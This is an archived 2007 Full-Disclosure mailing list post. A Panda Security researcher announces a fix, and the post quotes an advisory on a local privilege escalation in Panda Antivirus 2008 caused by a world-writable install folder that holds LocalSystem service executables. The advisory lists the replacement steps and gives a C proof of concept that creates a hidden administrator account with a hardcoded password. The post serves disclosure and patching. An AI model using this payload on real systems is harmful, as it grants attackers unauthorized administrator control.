Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | Re: [Full-disclosure] Panda Antivirus 2008 Local Privileg Escalation (UPS they did it again) |
|---|---|
| Date: | Wed, 19 Sep 2007 22:58:42 +0200 |
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Regarding the priviledge escalation report below for Panda Antivirus 2008, there is a fix available here: http://www.pandasecurity.com/homeusers/support/card?id=41111&idIdioma= 2&ref=PAV08Dev Users of vulnerable 2007 versions should upgrade to Panda Antivirus 2008 and apply the fix provided. For future vulnerability reporting to Panda please write specifically and exclusively to "Panda Security Response" <secure@pandasecurity.com> instead of generic beta or informational contact mailboxes. - ---------------------------------------------- Pedro Bustamante Senior Research Advisor Panda Security email: pedro.bustamante@pandasecurity.com <0xC684A6F9> vulns: secure@pandasecurity.com <0x70F3FEA0> phone: (+34) 91-8063700 blog: http://research.pandasoftware.com - ---------------------------------------------- _________________________________________ Security Advisory _________________________________________ Severity: Medium Title: Panda Antivirus 2008 Local Privileg Escalation Date: 02.08.07 Author: tarkus (tarkus (at) tiifp (dot) org) URL: https://tiifp.org/tarkus Vendor: Panda (http://www.pandasoftware.com/) Affected Products: Panda Antivirus 2008 Not Affected Products: - Panda Internetsecurity 2008 - - Panda Antivirus + Firewall 2008 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Description: - ------------ 1. During installation of Panda Antivirus 2008 the permissions for installation folder %ProgramFiles%\Panda Security\Panda Antivirus 2008by default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE) are started from this folder. Services are started under LocalSystem account. There is no protection of service files. It's possible for unprivileged user to replace service executable with the file of his choice to get full access with LocalSystem privileges. Or to get privileges or any user (including system administrator) who logons to vulnerable host. This can be exploited by: a. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder b. Copy any application to PAVSRV51.exe c. Reboot Upon reboot trojaned application will be executed with LocalSystem account. BTW: Check this from last year (http://www.securityfocus.com/bid/19891) POC: - ---- #include <windows.h> #include <stdio.h> INT main( VOID ) { CHAR szWinDir[ _MAX_PATH ]; CHAR szCmdLine[ _MAX_PATH ]; GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH ); printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" ); wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir ); system( szCmdLine ); printf( "Adding user \"owner\" to the local Administrators group...\n" ); wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir ); system( szCmdLine ); return 0; } Vendor Response: - ---------------- [...] Thank you very much for having reported us this piece of information. This feedback will allow us to keep improving our products and to prepare new releases that will fit your actual needs and helps us to create a better product. [...] Disclosure Timeline: - -------------------- 2007.06.07 - Vulnerability found 2007.06.07 - Reported to Vendor (Until Beta) 2007.07.31 - Released by vender 2007.08.02 - Public Disclosure -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 iQA/AwUBRvGNgo6s6aZw8/6gEQKByQCgkNraFuCwXwqU13zaJfvRroHgKQcAn3mz lluFlAcVUyeyeuMXqRaiygc5 =8GnR -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | rPSA-2007-0193-1 gdm, rPath Update Announcements |
|---|---|
| Next by Date: | [Full-disclosure] [ GLSA 200709-12 ] Poppler: Two buffer overflow vulnerabilities, Raphael Marichez |
| Previous by Thread: | rPSA-2007-0193-1 gdm, rPath Update Announcements |
| Next by Thread: | Re: [Full-disclosure] Panda Antivirus 2008 Local Privileg Escalation (UPS they did it again), 3APA3A |
| Indexes: | [Date] [Thread] [Top] [All Lists] |